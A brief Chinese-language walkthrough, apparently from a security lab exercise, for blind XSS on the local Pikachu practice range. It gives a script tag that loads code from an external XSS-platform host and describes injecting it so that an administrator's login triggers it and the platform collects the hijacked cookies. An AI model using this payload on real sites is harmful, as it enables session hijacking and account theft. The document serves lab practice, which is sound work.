首先需要打开xss平台进行注册https://xssaq.com/
然后同时打开pikachu靶场漏洞练习http://127.0.0.1/pikachu-master
1.创建新的项目
2.查看我的项目然后点击查看配置代码
3.复制<sCRiPt sRC=//d00.cc/KOi></sCrIpT>
4.打开pikachuxss盲打并将我们刚才复制的script恶意代码输⼊进去
5.模拟管理员登录后台的操作 登录完成后触发我们插⼊的恶意代码
6.返回xss平台查看cookie
7.查看被劫持到的cookie信息